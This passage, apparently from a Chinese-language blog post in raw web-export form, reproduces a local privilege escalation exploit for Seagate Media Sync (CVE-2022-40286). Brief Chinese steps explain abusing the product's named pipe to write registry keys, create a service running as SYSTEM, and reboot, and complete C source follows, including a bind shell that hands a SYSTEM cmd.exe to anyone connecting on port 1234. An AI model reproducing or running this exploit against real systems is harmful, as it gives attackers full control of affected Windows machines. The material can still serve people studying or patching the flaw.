dwDataLength, &dwBytesWritten, NULL) == 0)\n\t{\n\t\tfree(pDataBlock);\n\t\tCloseHandle(hPipe);\n\t\treturn 1;\n\t}\n\n\t\/\/ free buffer\n\tfree(pDataBlock);\n\n\t\/\/ close pipe\n\tCloseHandle(hPipe);\n\n\treturn 0;\n}\n\nDWORD SetRegString(char *pKeyPath, char *pValueName, char *pValue)\n{\n\tSeagateRegistryCommandDataStruct SeagateRegistryCommandData;\n\n\t\/\/ initialise seagate registry command data (string)\n\tmemset((void*)&SeagateRegistryCommandData, 0, sizeof(SeagateRegistryCommandData));\n\tmbstowcs(SeagateRegistryCommandData.wszKeyPath, pKeyPath, (sizeof(SeagateRegistryCommandData.wszKeyPath) \/ sizeof(wchar_t)) - 1);\n\tmbstowcs(SeagateRegistryCommandData.wszValueName, pValueName, (sizeof(SeagateRegistryCommandData.wszValueName) \/ sizeof(wchar_t)) - 1);\n\tmbstowcs(SeagateRegistryCommandData.wszValueString, pValue, (sizeof(SeagateRegistryCommandData.wszValueString) \/ sizeof(wchar_t)) - 1);\n\tSeagateRegistryCommandData.dwValueStringLength = (wcslen(SeagateRegistryCommandData.wszValueString) + 1) * sizeof(wchar_t);\n\n\t\/\/ send command\n\tif(SendSeagateCommand(0x10, 0x400, (BYTE*)&SeagateRegistryCommandData, sizeof(SeagateRegistryCommandData)) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nSetRegString(\"SOFTWARE\\\\Microsoft\\\\x86matthew\", \"x86matthew\", \"test_value\");\n<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-17.png\")
<\/figure>\n\n\n\n
3. \u901a\u8fc7\u5c06\u9006\u5411\u5de5\u7a0b\u7684\u6ce8\u518c\u8868\u547d\u4ee4\u53d1\u9001\u5230\u5e0c\u6377\u547d\u540d\u7ba1\u9053\u6765\u521b\u5efa\u65b0\u7684 Windows \u670d\u52a1\u3002\u4f7f\u7528\u5f53\u524d exe \u4f5c\u4e3a\u8fdb\u7a0b\u8def\u5f84\uff0c\u5c06\u65b0\u6761\u76ee\u6dfb\u52a0\u5230HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services \u3002
4. \u91cd\u65b0\u542f\u52a8\u8ba1\u7b97\u673a\u3002
5. Windows \u5c06\u5728\u542f\u52a8\u65f6\u81ea\u52a8\u542f\u52a8\u6211\u4eec\u65b0\u521b\u5efa\u7684\u201c\u670d\u52a1\u201d\u3002\u6f0f\u6d1e\u5229\u7528\u53ef\u6267\u884c\u6587\u4ef6\u5c06\u68c0\u6d4b\u5230\u5b83\u4ee5SYSTEM\u8eab\u4efd\u8fd0\u884c\u5e76\u4fa6\u542c\u7aef\u53e3 1234 \u4e0a\u7684 TCP \u8fde\u63a5\u3002
6. \u5f53\u7528\u6237\u8fde\u63a5\u5230localhost:1234\u65f6\uff0c\u6f0f\u6d1e\u5229\u7528\u670d\u52a1\u5c06\u4ee5SYSTEM\u8eab\u4efd\u542f\u52a8\u65b0\u7684cmd.exe\u8fdb\u7a0b\uff0c\u5e76\u91cd\u5b9a\u5411 stdin\/stdout\u5230\u5ba2\u6237\u7aef\u5957\u63a5\u5b57\u3002<\/p>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-18.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-19.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.aqwu.net\/wp\/wp-content\/uploads\/2022\/09\/\u56fe\u7247-20.png\")
<\/figure>\n\n\n\n#include <stdio.h>\n#include <winsock2.h>\n#include <windows.h>\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\/\/ reverse-engineered seagate command header\nstruct SeagateCommandHeaderStruct\n{\n\tWORD wSignature;\n\tWORD wMajorCommandID;\n\tDWORD dwMinorCommandID;\n};\n\n\/\/ reverse-engineered seagate registry command data\nstruct SeagateRegistryCommandDataStruct\n{\n\twchar_t wszKeyPath[2048];\n\twchar_t wszValueName[2048];\n\twchar_t wszValueString[2048];\n\tDWORD dwValueStringLength;\n\tDWORD dwDwordValue;\n};\n\nDWORD SendSeagateCommand(WORD wMajorCommandID, DWORD dwMinorCommandID, BYTE *pCommandData, DWORD dwCommandDataLength)\n{\n\tHANDLE hPipe = NULL;\n\tDWORD dwBytesWritten = 0;\n\tDWORD dwDataLength = 0;\n\tSeagateCommandHeaderStruct SeagateCommandHeader;\n\tBYTE *pDataBlock = NULL;\n\n\t\/\/ open seagate media sync pipe\n\thPipe = CreateFile(\"\\\\\\\\.\\\\pipe\\\\MEDIA_AGGRE_PIPE.PIP\", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);\n\tif(hPipe == INVALID_HANDLE_VALUE)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ initialise command header\n\tmemset((void*)&SeagateCommandHeader, 0, sizeof(SeagateCommandHeader));\n\tSeagateCommandHeader.wSignature = 0x4B5C;\n\tSeagateCommandHeader.wMajorCommandID = wMajorCommandID;\n\tSeagateCommandHeader.dwMinorCommandID = dwMinorCommandID;\n\n\t\/\/ calculate total data length\n\tdwDataLength = sizeof(SeagateCommandHeader) + dwCommandDataLength;\n\n\t\/\/ write data length to pipe\n\tif(WriteFile(hPipe, (void*)&dwDataLength, sizeof(dwDataLength), &dwBytesWritten, NULL) == 0)\n\t{\n\t\tCloseHandle(hPipe);\n\t\treturn 1;\n\t}\n\n\t\/\/ allocate buffer to combine the command header and data\n\tpDataBlock = (BYTE*)malloc(dwDataLength);\n\tif(pDataBlock == NULL)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ copy the header and data into the data buffer\n\tmemcpy((void*)pDataBlock, (void*)&SeagateCommandHeader, sizeof(SeagateCommandHeader));\n\tmemcpy((void*)((BYTE*)pDataBlock + sizeof(SeagateCommandHeader)), (void*)pCommandData, dwCommandDataLength);\n\n\t\/\/ write the message to the pipe\n\tif(WriteFile(hPipe, (void*)pDataBlock, dwDataLength, &dwBytesWritten, NULL) == 0)\n\t{\n\t\tfree(pDataBlock);\n\t\tCloseHandle(hPipe);\n\t\treturn 1;\n\t}\n\n\t\/\/ free buffer\n\tfree(pDataBlock);\n\n\t\/\/ close pipe\n\tCloseHandle(hPipe);\n\n\treturn 0;\n}\n\nDWORD SetRegString(char *pKeyPath, char *pValueName, char *pValue)\n{\n\tSeagateRegistryCommandDataStruct SeagateRegistryCommandData;\n\n\t\/\/ initialise seagate registry command data (string)\n\tmemset((void*)&SeagateRegistryCommandData, 0, sizeof(SeagateRegistryCommandData));\n\tmbstowcs(SeagateRegistryCommandData.wszKeyPath, pKeyPath, (sizeof(SeagateRegistryCommandData.wszKeyPath) \/ sizeof(wchar_t)) - 1);\n\tmbstowcs(SeagateRegistryCommandData.wszValueName, pValueName, (sizeof(SeagateRegistryCommandData.wszValueName) \/ sizeof(wchar_t)) - 1);\n\tmbstowcs(SeagateRegistryCommandData.wszValueString, pValue, (sizeof(SeagateRegistryCommandData.wszValueString) \/ sizeof(wchar_t)) - 1);\n\tSeagateRegistryCommandData.dwValueStringLength = (wcslen(SeagateRegistryCommandData.wszValueString) + 1) * sizeof(wchar_t);\n\n\t\/\/ send command\n\tif(SendSeagateCommand(0x10, 0x400, (BYTE*)&SeagateRegistryCommandData, sizeof(SeagateRegistryCommandData)) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nDWORD SetRegDword(char *pKeyPath, char *pValueName, DWORD dwValue)\n{\n\tSeagateRegistryCommandDataStruct SeagateRegistryCommandData;\n\n\t\/\/ initialise seagate registry command data (dword)\n\tmemset((void*)&SeagateRegistryCommandData, 0, sizeof(SeagateRegistryCommandData));\n\tmbstowcs(SeagateRegistryCommandData.wszKeyPath, pKeyPath, (sizeof(SeagateRegistryCommandData.wszKeyPath) \/ sizeof(wchar_t)) - 1);\n\tmbstowcs(SeagateRegistryCommandData.wszValueName, pValueName, (sizeof(SeagateRegistryCommandData.wszValueName) \/ sizeof(wchar_t)) - 1);\n\tSeagateRegistryCommandData.dwDwordValue = dwValue;\n\n\t\/\/ send command\n\tif(SendSeagateCommand(0x10, 0x410, (BYTE*)&SeagateRegistryCommandData, sizeof(SeagateRegistryCommandData)) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nDWORD StartBindShell(WORD wPort)\n{\n\tsockaddr_in SockAddr;\n\tPROCESS_INFORMATION ProcessInfo;\n\tSTARTUPINFO StartupInfo;\n\tSOCKET ListenSocket = 0;\n\tSOCKET AcceptSocket = 0;\n\n\t\/\/ create listen socket\n\tListenSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);\n\tif(ListenSocket == INVALID_SOCKET)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ set socket addr info\n\tmemset((void*)&SockAddr, 0, sizeof(SockAddr));\n\tSockAddr.sin_family = AF_INET;\n\tSockAddr.sin_port = htons(wPort);\n\tSockAddr.sin_addr.s_addr = htonl(INADDR_ANY);\n\n\t\/\/ bind socket\n\tif(bind(ListenSocket, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)\n\t{\n\t\tclosesocket(ListenSocket);\n\t\treturn 1;\n\t}\n\n\t\/\/ listen\n\tif(listen(ListenSocket, 1) == SOCKET_ERROR)\n\t{\n\t\tclosesocket(ListenSocket);\n\t\treturn 1;\n\t}\n\n\t\/\/ wait for clients\n\tfor(;;)\n\t{\n\t\t\/\/ wait for connection\n\t\tAcceptSocket = accept(ListenSocket, NULL, NULL);\n\t\tif(AcceptSocket == INVALID_SOCKET)\n\t\t{\n\t\t\tclosesocket(ListenSocket);\n\t\t\treturn 1;\n\t\t}\n\n\t\t\/\/ set StartupInfo fields - redirect input\/output to socket\n\t\tmemset((void*)&StartupInfo, 0, sizeof(StartupInfo));\n\t\tStartupInfo.cb = sizeof(StartupInfo);\n\t\tStartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;\n\t\tStartupInfo.wShowWindow = SW_HIDE;\n\t\tStartupInfo.hStdInput = (HANDLE)AcceptSocket;\n\t\tStartupInfo.hStdOutput = (HANDLE)AcceptSocket;\n\t\tStartupInfo.hStdError = (HANDLE)AcceptSocket;\n\n\t\t\/\/ create cmd.exe process with inherited handles\n\t\tmemset((void*)&ProcessInfo, 0, sizeof(ProcessInfo));\n\t\tif(CreateProcess(NULL, \"cmd.exe\", NULL, NULL, 1, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInfo) == 0)\n\t\t{\n\t\t\tclosesocket(AcceptSocket);\n\t\t\tclosesocket(ListenSocket);\n\t\t\treturn 1;\n\t\t}\n\n\t\t\/\/ client socket has been passed to cmd.exe - close socket in local process\n\t\tclosesocket(AcceptSocket);\n\t}\n\n\t\/\/ close listen socket\n\tclosesocket(ListenSocket);\n\n\treturn 0;\n}\n\nDWORD ConfirmSystemUser()\n{\n\tHANDLE hToken = NULL;\n\tBYTE bTokenUser[1024];\n\tDWORD dwLength = 0;\n\tSID_IDENTIFIER_AUTHORITY SidIdentifierAuthority;\n\tTOKEN_USER *pTokenUser = NULL;\n\tvoid *pSystemSid = NULL;\n\n\t\/\/ open process token\n\tif(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken) == 0)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ get user SID\n\tpTokenUser = (TOKEN_USER*)bTokenUser;\n\tif(GetTokenInformation(hToken, TokenUser, pTokenUser, sizeof(bTokenUser), &dwLength) == 0)\n\t{\n\t\tCloseHandle(hToken);\n\t\treturn 1;\n\t}\n\n\t\/\/ close token handle\n\tCloseHandle(hToken);\n\n\t\/\/ SECURITY_NT_AUTHORITY\n\tSidIdentifierAuthority.Value[0] = 0;\n\tSidIdentifierAuthority.Value[1] = 0;\n\tSidIdentifierAuthority.Value[2] = 0;\n\tSidIdentifierAuthority.Value[3] = 0;\n\tSidIdentifierAuthority.Value[4] = 0;\n\tSidIdentifierAuthority.Value[5] = 5;\n\n\t\/\/ get SYSTEM user SID\n\tif(AllocateAndInitializeSid(&SidIdentifierAuthority, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid) == 0)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ check if this is the SYSTEM user\n\tif(EqualSid(pTokenUser->User.Sid, pSystemSid) == 0)\n\t{\n\t\tFreeSid(pSystemSid);\n\t\treturn 1;\n\t}\n\n\t\/\/ clean up\n\tFreeSid(pSystemSid);\n\n\treturn 0;\n}\n\nDWORD CreateServiceViaSeagate(char *pServiceName, char *pExePath)\n{\n\tchar szServiceKey[512];\n\tchar szImagePath[512];\n\tchar szWindowsDir[512];\n\n\t\/\/ get windows directory\n\tmemset(szWindowsDir, 0, sizeof(szWindowsDir));\n\tGetWindowsDirectory(szWindowsDir, sizeof(szWindowsDir) - 1);\n\n\t\/\/ set service key\n\tmemset(szServiceKey, 0, sizeof(szServiceKey));\n\t_snprintf(szServiceKey, sizeof(szServiceKey) - 1, \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\%s\", pServiceName);\n\n\t\/\/ set image path\n\t\/\/ (cmd.exe will launch this process in the background - this is to prevent the service manager from killing our process for not responding to service status requests)\n\tmemset(szImagePath, 0, sizeof(szImagePath));\n\t_snprintf(szImagePath, sizeof(szImagePath) - 1, \"\\\"%s\\\\system32\\\\cmd.exe\\\" \/c start \\\"\\\" \\\"%s\\\"\", szWindowsDir, pExePath);\n\n\t\/\/ set registry value\n\tif(SetRegString(szServiceKey, \"ImagePath\", szImagePath) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ set registry value\n\tif(SetRegString(szServiceKey, \"ObjectName\", \"LocalSystem\") != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ set registry value\n\tif(SetRegDword(szServiceKey, \"ErrorControl\", 1) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ set registry value\n\tif(SetRegDword(szServiceKey, \"Start\", 2) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\t\/\/ set registry value\n\tif(SetRegDword(szServiceKey, \"Type\", 16) != 0)\n\t{\n\t\treturn 1;\n\t}\n\n\treturn 0;\n}\n\nint main()\n{\n\tWSADATA WinsockData;\n\tchar szPath[512];\n\n\t\/\/ check if this process is running as SYSTEM user\n\tif(ConfirmSystemUser() == 0)\n\t{\n\t\t\/\/ initialise winsock\n\t\tif(WSAStartup(MAKEWORD(2, 2), &WinsockData) != 0)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\n\t\t\/\/ ready - start tcp bind shell on port 1234\n\t\tif(StartBindShell(1234) != 0)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\t}\n\telse\n\t{\n\t\tprintf(\"Seagate Media Sync (Version 2.01.0414) - Windows Local Privilege Escalation Exploit (CVE-2022-40286)\\n\");\n\t\tprintf(\"x86matthew (www.x86matthew.com)\\n\\n\");\n\n\t\tprintf(\"Retrieving current exe path...\\n\");\n\n\t\t\/\/ get current exe path\n\t\tmemset(szPath, 0, sizeof(szPath));\n\t\tif(GetModuleFileName(NULL, szPath, sizeof(szPath) - 1) == 0)\n\t\t{\n\t\t\tprintf(\"Error: Failed to get current exe path\\n\");\n\n\t\t\treturn 1;\n\t\t}\n\n\t\tprintf(\"Creating service...\\n\");\n\n\t\t\/\/ create service\n\t\tif(CreateServiceViaSeagate(\"x86matthew_seagate_svc\", szPath) != 0)\n\t\t{\n\t\t\tprintf(\"Error: Failed to add service via Seagate Media Sync service\\n\");\n\n\t\t\treturn 1;\n\t\t}\n\n\t\tprintf(\"Service created successfully - reboot and connect to localhost:1234 for SYSTEM shell\\n\");\n\t}\n\n\treturn 0;\n}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"